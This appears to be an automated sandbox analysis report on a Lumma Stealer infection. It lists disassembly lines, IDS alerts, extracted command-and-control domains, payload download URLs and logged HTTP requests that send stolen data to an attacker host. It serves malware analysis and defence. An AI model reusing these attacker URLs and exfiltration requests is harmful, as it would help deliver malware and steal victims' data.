                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]12_2_0043F330
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax12_2_0040DBD9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax12_2_0040DBD9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]12_2_00417380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h12_2_0041D380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh12_2_00426B95
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]12_2_00435450
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]12_2_00417380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push 00000000h12_2_00429C2B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx12_2_004291DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]12_2_004291DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]12_2_004074F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]12_2_004074F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]12_2_0043ECA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h12_2_004385E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax12_2_004385E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]12_2_00417DEE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax12_2_00409580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebp+00h], ax12_2_00409580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [0044450Ch]12_2_00418591
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]12_2_00428D93
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then xor edi, edi12_2_0041759F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]12_2_0041C653
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebp12_2_00425E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [004455F4h]12_2_00425E30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax12_2_0043AEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al12_2_00408F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], bl12_2_00408F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]12_2_0042A700
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]12_2_0040B70C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al12_2_0041BF14
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]12_2_00419F30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]12_2_0041E7C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, word ptr [edx]12_2_004197C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], dx12_2_004197C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx12_2_004197C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, ebx12_2_0042DFE9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx12_2_0040BFFD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]12_2_0043EFB0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49823 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49823 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49837 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49825 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49825 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49866 -> 104.21.112.1:443
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: hushedocenahu.click
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: global trafficHTTP traffic detected: GET /singl7.pst HTTP/1.1Host: dma.sportstalk-musiclover.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49825 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49837 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49843 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49860 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49831 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49854 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49866 -> 104.21.112.1:443
                Source: global trafficHTTP traffic detected: GET /singl7.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: scrutinycheck.cashConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LOQHJJY7E0F02RWXUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=65U60J1U38User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8737Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9PD5G4RIDGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RZOZ3PLVHXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1197Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BWW3KGT6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570992Host: hushedocenahu.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: hushedocenahu.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /singl7.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: scrutinycheck.cashConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /singl7.pst HTTP/1.1Host: dma.sportstalk-musiclover.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: scrutinycheck.cash
                Source: global trafficDNS traffic detected: DNS query: dma.sportstalk-musiclover.com
                Source: global trafficDNS traffic detected: DNS query: hushedocenahu.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hushedocenahu.click
                Source: svchost.exe, 00000003.00000002.3369206045.0000029796000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795E08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795E08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795E08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795E3D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: powershell.exe, 00000004.00000002.1788739596.0000029766D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.00000297587FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1788739596.0000029766E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.1707001307.0000026C0A641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.0000029756CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000000.00000002.1707001307.0000026C0A68A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                Source: powershell.exe, 00000000.00000002.1707001307.0000026C0A6AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.0000029756CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000006.00000002.2611936982.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
                Source: powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.1764165134.0000029757A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dma.sportstalk-musiclover.com
                Source: powershell.exe, 00000006.00000002.2608100083.0000000003365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dma.sportstalk-musiclover.com/singl7.pst
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795EB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795EB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: powershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.1764165134.0000029757A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2800133767.0000000003447000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/
                Source: powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/api
                Source: powershell.exe, 0000000C.00000002.2803637158.000000000349D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/api:6x
                Source: powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/apiB=
                Source: powershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/apib
                Source: powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/apid=:c
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/bm
                Source: powershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/bu
                Source: powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/o
                Source: powershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click/pi
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click:443/api
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click:443/api5
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click:443/apiA
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hushedocenahu.click:443/apiK
                Source: mshta.exe, 00000002.00000002.1822900003.000001FD98C02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818296198.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: powershell.exe, 00000004.00000002.1788739596.0000029766D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.00000297587FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1788739596.0000029766E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: svchost.exe, 00000003.00000003.1732763715.0000029795EB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                Source: mshta.exe, 00000002.00000002.1822900003.000001FD98C02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818296198.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/P
                Source: mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822579001.000001FD98B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818681385.000001FD98C32000.00000004.00000020.00020000.00000000.sdmp, 00000.ps1String found in binary or memory: https://scrutinycheck.cash/singl7.mp4
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4(O
                Source: mshta.exe, 00000002.00000002.1823781557.000002059AD41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4...
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4.O
                Source: mshta.exe, 00000002.00000002.1822579001.000001FD98B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp40w&
                Source: mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp430
                Source: mshta.exe, 00000002.00000002.1825644443.000002059F075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4432=C:
                Source: mshta.exe, 00000002.00000002.1822735275.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1803612223.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4:6
                Source: mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4;
                Source: mshta.exe, 00000002.00000002.1823159169.000001FD98D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4BROWSER_APP_y
                Source: mshta.exe, 00000002.00000003.1818296198.000001FD98C2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1804302516.000001FD98C27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1823014158.000001FD98C33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C26000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822579001.000001FD98B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818681385.000001FD98C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4C:
                Source: mshta.exe, 00000002.00000002.1822137418.000001FD98AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4H
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4O
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4SSC:
                Source: mshta.exe, 00000002.00000002.1822735275.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1803612223.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4Windows
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4ZO
                Source: mshta.exe, 00000002.00000002.1825644443.000002059F075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4beLMEMP(
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4c
                Source: mshta.exe, 00000002.00000003.1811274652.000002059AF65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash/singl7.mp4
                Source: mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash/singl7.mp46
                Source: mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash
